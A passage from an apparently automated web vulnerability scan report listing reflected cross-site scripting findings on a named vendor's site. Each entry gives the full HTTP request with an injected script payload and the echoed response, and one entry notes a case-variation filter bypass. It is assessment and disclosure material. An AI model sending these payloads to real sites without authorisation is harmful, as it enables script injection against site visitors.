The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91744"-alert(1)-"0beacbc514a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products-services91744"-alert(1)-"0beacbc514a/home-computer-security HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:04:53 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688293"
Content-Type: text/html; charset=utf-8
Content-Length: 31544
Date: Sat, 18 Dec 2010 16:04:59 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
rop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services91744"-alert(1)-"0beacbc514a/home-computer-security";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.274. http://usa.kaspersky.com/products-services/home-computer-security [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d872"><ScRiPt>alert(1)</ScRiPt>6b9e93c4a5a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /products-services/home-computer-security9d872"><ScRiPt>alert(1)</ScRiPt>6b9e93c4a5a HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:07:42 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688462"
Content-Type: text/html; charset=utf-8
Content-Length: 30289
Date: Sat, 18 Dec 2010 16:07:48 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security9d872"><ScRiPt>alert(1)</ScRiPt>6b9e93c4a5a" />
...[SNIP]...

1.275. http://usa.kaspersky.com/products-services/home-computer-security [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 630eb"-alert(1)-"428669977a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products-services/home-computer-security630eb"-alert(1)-"428669977a0 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:08:02 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688482"
Content-Type: text/html; charset=utf-8
Content-Length: 31513
Date: Sat, 18 Dec 2010 16:08:09 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security630eb"-alert(1)-"428669977a0";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.276. http://usa.kaspersky.com/products-services/home-computer-security [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1ff1"><script>alert(1)</script>6816875f861 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security?d1ff1"><script>alert(1)</script>6816875f861=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:01:11 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688071"
Content-Type: text/html; charset=utf-8
Content-Length: 48543
Date: Sat, 18 Dec 2010 16:01:23 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security?d1ff1"><script>alert(1)</script>6816875f861=1" />
...[SNIP]...

1.277. http://usa.kaspersky.com/products-services/home-computer-security/anti-virus [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security/anti-virus

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de44e"><script>alert(1)</script>1f91b003d49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-servicesde44e"><script>alert(1)</script>1f91b003d49/home-computer-security/anti-virus HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:06:08 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688368"
Content-Type: text/html; charset=utf-8
Content-Length: 35813
Date: Sat, 18 Dec 2010 16:06:30 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-servicesde44e"><script>alert(1)</script>1f91b003d49/home-computer-security/anti-virus" />
...[SNIP]...

1.278. http://usa.kaspersky.com/products-services/home-computer-security/anti-virus [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security/anti-virus

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d6d2"-alert(1)-"b9ce3a0b420 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products-services3d6d2"-alert(1)-"b9ce3a0b420/home-computer-security/anti-virus HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:06:48 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688408"
Content-Type: text/html; charset=utf-8
Content-Length: 39524
Date: Sat, 18 Dec 2010 16:06:56 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
rop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services3d6d2"-alert(1)-"b9ce3a0b420/home-computer-security/anti-virus";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.279. http://usa.kaspersky.com/products-services/home-computer-security/anti-virus [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security/anti-virus

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ff5a"><script>alert(1)</script>e735526aa2c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security1ff5a"><script>alert(1)</script>e735526aa2c/anti-virus HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:09:57 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688597"
Content-Type: text/html; charset=utf-8
Content-Length: 35399
Date: Sat, 18 Dec 2010 16:10:05 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security1ff5a"><script>alert(1)</script>e735526aa2c/anti-virus" />
...[SNIP]...

1.280. http://usa.kaspersky.com/products-services/home-computer-security/anti-virus [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security/anti-virus

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload baec3"-alert(1)-"232c9403923 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products-services/home-computer-securitybaec3"-alert(1)-"232c9403923/anti-virus HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:10:40 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688640"
Content-Type: text/html; charset=utf-8
Content-Length: 39001
Date: Sat, 18 Dec 2010 16:10:48 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-securitybaec3"-alert(1)-"232c9403923/anti-virus";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.281. http://usa.kaspersky.com/products-services/home-computer-security/anti-virus [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security/anti-virus

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f1be"><script>alert(1)</script>941b6eb375b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/anti-virus1f1be"><script>alert(1)</script>941b6eb375b HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:13:41 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688821"
Content-Type: text/html; charset=utf-8
Content-Length: 35601
Date: Sat, 18 Dec 2010 16:13:50 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/anti-virus1f1be"><script>alert(1)</script>941b6eb375b" />
...[SNIP]...

1.282. http://usa.kaspersky.com/products-services/home-computer-security/anti-virus [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security/anti-virus

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf027"-alert(1)-"aea6c8addbd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products-services/home-computer-security/anti-viruscf027"-alert(1)-"aea6c8addbd HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:14:09 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688849"
Content-Type: text/html; charset=utf-8
Content-Length: 39089
Date: Sat, 18 Dec 2010 16:14:13 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
= s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security/anti-viruscf027"-alert(1)-"aea6c8addbd";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.283. http://usa.kaspersky.com/products-services/home-computer-security/anti-virus [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security/anti-virus

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0da2"><script>alert(1)</script>b3e4f13ccca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/anti-virus?e0da2"><script>alert(1)</script>b3e4f13ccca=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:03:14 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688194"
Content-Type: text/html; charset=utf-8
Content-Length: 95862
Date: Sat, 18 Dec 2010 16:03:25 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/anti-virus?e0da2"><script>alert(1)</script>b3e4f13ccca=1" />
...[SNIP]...

1.284. http://usa.kaspersky.com/products-services/home-computer-security/anti-virus-for-mac [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security/anti-virus-for-mac

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 637dc"><script>alert(1)</script>98b66a152cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services637dc"><script>alert(1)</script>98b66a152cc/home-computer-security/anti-virus-for-mac HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:05:55 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688355"
Content-Type: text/html; charset=utf-8
Content-Length: 30403
Date: Sat, 18 Dec 2010 16:06:01 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services637dc"><script>alert(1)</script>98b66a152cc/home-computer-security/anti-virus-for-mac" />
...[SNIP]...

1.285. http://usa.kaspersky.com/products-services/home-computer-security/anti-virus-for-mac [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security/anti-virus-for-mac

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d2b5"-alert(1)-"42a300641ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products-services3d2b5"-alert(1)-"42a300641ec/home-computer-security/anti-virus-for-mac HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 16:06:13 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292688373"
Content-Type: text/html; charset=utf-8
Content-Length: 37649
Date: Sat, 18 Dec 2010 16:06:23 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
rop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services3d2b5"-alert(1)-"42a300641ec/home-computer-security/anti-virus-for-mac";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.286. http://usa.kaspersky.com/products-services/home-computer-security/anti-virus-for-mac [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security/anti-virus-for-mac

Issue detail

